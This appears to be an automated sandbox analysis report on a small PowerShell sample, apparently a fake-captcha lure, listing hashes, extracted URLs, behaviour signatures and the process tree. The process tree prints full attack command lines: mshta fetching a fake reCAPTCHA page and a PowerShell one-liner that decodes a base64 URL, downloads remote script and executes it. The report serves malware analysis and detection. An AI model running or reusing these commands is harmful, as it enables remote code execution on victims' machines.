Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-12-2024 17:44
Static task
static1
Behavioral task
behavioral1
Sample
run.ps1
Resource
win7-20240903-en
General
-
Target
run.ps1
-
Size
98B
-
MD5
f06b8028feb204bc56013b2f961ea80c
-
SHA1
8d5eeee9730fcd09b7e46b566d00b28458405457
-
SHA256
cd1dab4f48894954a1c3fec77cb8af692a49853cb7b0c748021bbecbec8496c1
-
SHA512
fbc4f28323c80ccd2faf9030aefecb47846aa379df61f6bcbcaf093691669f375cfcb09a519969d16e0e3b88faf5baaa0538faf3695c95595d501f3839bedc76
Malware Config
Extracted
https://recaptha-verify-8u.pages.dev
Extracted
https://polovoiinspektor.shop/secure/login.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1516 mshta.exe 7 1516 mshta.exe -
pid Process 1732 powershell.exe 2648 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1732 powershell.exe 2648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1732 wrote to memory of 1516 1732 powershell.exe 31 PID 1732 wrote to memory of 1516 1732 powershell.exe 31 PID 1732 wrote to memory of 1516 1732 powershell.exe 31 PID 1516 wrote to memory of 2648 1516 mshta.exe 33 PID 1516 wrote to memory of 2648 1516 mshta.exe 33 PID 1516 wrote to memory of 2648 1516 mshta.exe 33
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://recaptha-verify-8u.pages.dev2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U093M1W5Q9U1U98QL0J7.temp
Filesize7KB
MD5d0cd7f929e651c9482562d1784a1b722
SHA128a54f1fe3a7d2bd3cebacb091a89880367fe8e5
SHA2565b57e37aaeb007ea13d519a25c966dda606ef331f860b08180dab6af0d099a7c
SHA5121c7721dc6ddd1ecf9bedcb94651f08082c442e9a2ae4c97800af468d96e9c0ad33e1ec9a6a2a6216270673d39cda26d2b08dd88f78c2b75cdcdc612a2a7c2ba7